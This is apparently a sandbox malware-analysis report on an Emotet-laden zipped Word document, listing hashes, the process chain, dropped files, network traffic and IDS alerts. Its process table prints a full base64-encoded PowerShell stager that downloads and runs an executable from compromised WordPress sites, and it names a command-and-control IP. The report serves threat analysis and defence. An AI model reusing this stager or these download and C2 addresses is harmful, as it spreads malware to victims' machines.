File name: | 1237533.zip |
Full analysis: | https://app.any.run/tasks/94c61c39-e71c-4853-b37a-f338ccf68662 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 15, 2019, 07:12:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | FB03475C75712F61FAB2DBC89F150B76 |
SHA1: | 80DFFC1F188EC351100546D981BB2FCA173D2398 |
SHA256: | B5D9A7A9BAD48ED71306C5027135B7C0D839BDB60DC4B3CF0C3800D35D8D3E62 |
SSDEEP: | 3072:nhFdH3rtLYBOwnBKU6xUlhWuyEZhv14J3W/D8Q:VH3BLYAF+hWuDC3y |
.zip | | | ZIP compressed archive (100) |
---|
ZipFileName: | 1237533.doc |
---|---|
ZipUncompressedSize: | 226688 |
ZipCompressedSize: | 138376 |
ZipCRC: | 0xfe6623d0 |
ZipModifyDate: | 2019:04:04 14:04:00 |
ZipCompression: | Unknown (99) |
ZipBitFlag: | 0x0003 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2904 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\1237533.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2624 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2904.37595\1237533.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4080 | powershell -e JABoAHgAQwBBAGMAQQBBAFEAIAA9ACAAJwA4ADAANQAnADsAJABGAFoAawBDAHcAQQBBAFoAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAFEAVQBRAEEAJwAsACcAMQBDACcAKQA7ACQAbgBVAGsAMQAxAF8AQgBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABoAHgAQwBBAGMAQQBBAFEAKwAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAZQAnACwAJwAuAGUAeAAnACkAOwAkAGMAQgBBAFUAQgBEAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACcAbwAnACwAJwBZAFoAWABBACcALAAnAFoAMQB4ACcAKQA7ACQAcABBAFUAQwB3AFgAPQBuAEUAYAB3AC0ATwBCAGoAZQBgAEMAdAAgACgAJwBOAGUAdAAuAFcAZQBiAEMAbAAnACsAJwBpAGUAJwArACcAbgB0ACcAKQA7ACQAYQBEAHgAQQBHAGMAPQAoACIAewAwAH0AewAzADYAfQB7ADMAfQB7ADMAOQB9AHsANAB9AHsANAAzAH0AewAzADMAfQB7ADYAfQB7ADEANwB9AHsAMQA1AH0AewAxADMAfQB7ADEAOQB9AHsAMQA0AH0AewAzADUAfQB7ADUAfQB7ADIANAB9AHsAMgA1AH0AewAzADcAfQB7ADMAMgB9AHsAMQAyAH0AewAyADkAfQB7ADIANgB9AHsAOAB9AHsAMgAwAH0AewAxADgAfQB7ADIAOAB9AHsAMgB9AHsAMgAxAH0AewAzADQAfQB7ADQAMQB9AHsANAAwAH0AewAzADEAfQB7ADIANwB9AHsANwB9AHsAMQA2AH0AewAzADgAfQB7ADEAMQB9AHsAMQB9AHsAMQAwAH0AewAzADAAfQB7ADkAfQB7ADIAMgB9AHsANAAyAH0AewA0ADUAfQB7ADQANAB9AHsAMgAzAH0AIgAgAC0AZgAgACcAaAB0ACcALAAnAG0AVAAvAEAAaAB0AHQAcAA6AC8ALwBkAGUAcwAnACwAJwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZAAwAHkAdgAnACwAJwBjAG8AbgB0AGUAbgAnACwAJwBvAGEAZABzAC8AMgAwACcALAAnAC4AYwBvAG0ALwB3ACcALAAnAC8AQABoAHQAdAAnACwAJwBuACcALAAnAG4AZQB0AC0AbAAnACwAJwAvAHcAJwAsACcAaQBnAG4AawBvAGsAdABhAGkAbAAuACcALAAnAC8AbQBhAHAAcwAvAGEAdQAnACwAJwBwADoAJwAsACcALwAvAGcAcgBpAGwAJwAsACcAcwB0AGEAdQByAGEAbgAnACwAJwA6ACcALAAnAGEAcwBvAGMAawBzAC4AYwAnACwAJwBwACcALAAnAHAALgBjAG8AJwAsACcAbABpAHQAcgBlACcALAAnAGcAJwAsACcALwAnACwAJwBwAC0AaQBuAGMAJwAsACcALwAnACwAJwBwACcALAAnAC0AYwBvAG4AdAAnACwAJwBhAGIAaQAnACwAJwBiAGEAcgBjAGUAbABvACcALAAnAG0ALwAnACwAJwAvAC8AYwAnACwAJwBjAG8AbQAnACwAJwBmAGMAJwAsACcAdAAvAHUAcABsAG8AYQBkAHMALwBhAFMAZABYAC8AQABoAHQAdAAnACwAJwBBAFAAMAAnACwAJwBAACcALAAnAHQAJwAsACcAdABwADoALwAvAGgAYQBkAGkAeQBhAGEAYwBvAHUAYgAuAGMAbwBtAC8AdwBwAC0AJwAsACcAZQBuACcALAAnAG8AbQAnACwAJwB0AC8AdQBwAGwAJwAsACcALwAnACwAJwBoAHQAdABwADoALwAnACwAJwBsACcALAAnADEAOQAvADYAJwAsACcAWgBUACcALAAnAHUAZABlAHMALwAnACkALgAiAHMAcABgAEwASQB0ACIAKAAnAEAAJwApADsAJABBAEQARAB4AEEARABBAG8APQAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBWACcALAAnAFoARwBfAGsAXwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJAB2AEEAVQBaADQAQQBBAEQAIABpAG4AIAAkAGEARAB4AEEARwBjACkAewB0AHIAeQB7ACQAcABBAFUAQwB3AFgALgAiAEQATwB3AE4AbABPAGAAQQBkAEYAYABJAGwAZQAiACgAJAB2AEEAVQBaADQAQQBBAEQALAAgACQAbgBVAGsAMQAxAF8AQgBvACkAOwAkAHoAVQBBAHgAQQBBAEMAPQAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAGYAUQBBAEcAJwAsACcARwBRACcAKQA7AEkAZgAgACgAKABnAEUAdAAtAGAASQBgAFQAZQBNACAAJABuAFUAawAxADEAXwBCAG8AKQAuACIAbABFAE4AZwBgAFQAaAAiACAALQBnAGUAIAAyADgANgA2ADMAKQAgAHsAaQBgAE4AdgBPAGsAYABlAC0ASQBUAGUATQAgACQAbgBVAGsAMQAxAF8AQgBvADsAJABBAFEAQQBfAGMAYwBRAEIAPQAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAEEAQQB4ADQAbwAnACwAJwByAFUAJwAsACcAQQAnACkAOwBiAHIAZQBhAGsAOwAkAFIAQQBEAEEAQQBrAEQAMQA9ACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBfAFEAJwAsACcAMQBBAEEAJwAsACcAbAB3AFoAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABNAF8AQQBjADEANABBAF8APQAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAEQAJwAsACcAbwBaAHcAYwBRACcAKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3076 | "C:\Users\admin\805.exe" | C:\Users\admin\805.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3636 | --ae5f3ebb | C:\Users\admin\805.exe | 805.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3140 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 805.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3096 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR235A.tmp.cvr | — | |
MD5:— | SHA256:— | |||
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EK5T46JB6RVBQ8JNUHJ1.temp | — | |
MD5:— | SHA256:— | |||
2624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:4CD5F2A8059DEF5196C26926FD1DCC7F | SHA256:EA37A2808F612FC89E26C6F554DE0FCC92075C4AB3F5391374DDCD4F5DF8838F | |||
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
4080 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF132c72.TMP | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
4080 | powershell.exe | C:\Users\admin\805.exe | executable | |
MD5:8961D353943918447ED8989A359A4DED | SHA256:F757D73F8C0011D3FE837A33EF391C6DC3BFBC46E496E50F383F7DE739035ED7 | |||
2624 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:234575D24E109711C57572B8D2FE1F1A | SHA256:ADFDFCB3D6A2C2334327BDF21744BA6BEDD792BDA6814FD3C948A9C250B8868F | |||
2904 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb2904.37595\1237533.doc | document | |
MD5:953BE355F97B1FA1AA40A1BA88F4459A | SHA256:372337F06774C48340DDB041C6A0415235049648109D3D88A57C2F74B7605511 | |||
2624 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb2904.37595\~$237533.doc | pgc | |
MD5:D7F49000FC7AAAC653B7D5B221C95E8C | SHA256:EDD9E60E8DDB9CA5AAD3A922DD4AAEBC6C68C79F34FDFBC0F0ED71ECC07A0355 | |||
3636 | 805.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:8961D353943918447ED8989A359A4DED | SHA256:F757D73F8C0011D3FE837A33EF391C6DC3BFBC46E496E50F383F7DE739035ED7 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4080 | powershell.exe | GET | 200 | 165.227.166.144:80 | http://hadiyaacoub.com/wp-content/uploads/2019/6AP0/ | DE | html | 1.64 Kb | suspicious |
4080 | powershell.exe | GET | 200 | 157.230.127.140:80 | http://grillitrestaurant.com/wp-content/uploads/aSdX/ | US | executable | 174 Kb | malicious |
3096 | soundser.exe | POST | 200 | 89.188.124.145:443 | http://89.188.124.145:443/bml/pnp/ | RU | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4080 | powershell.exe | 157.230.127.140:80 | grillitrestaurant.com | Joao Carlos de Almeida Silveira trading as Bitcanal | US | suspicious |
3096 | soundser.exe | 89.188.124.145:443 | — | Filanco, ltd. | RU | malicious |
4080 | powershell.exe | 165.227.166.144:80 | hadiyaacoub.com | Digital Ocean, Inc. | DE | suspicious |
Domain | IP | Reputation |
---|---|---|
hadiyaacoub.com |
| suspicious |
grillitrestaurant.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
4080 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
4080 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
4080 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
4080 | powershell.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
3096 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 23 |
3096 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3096 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |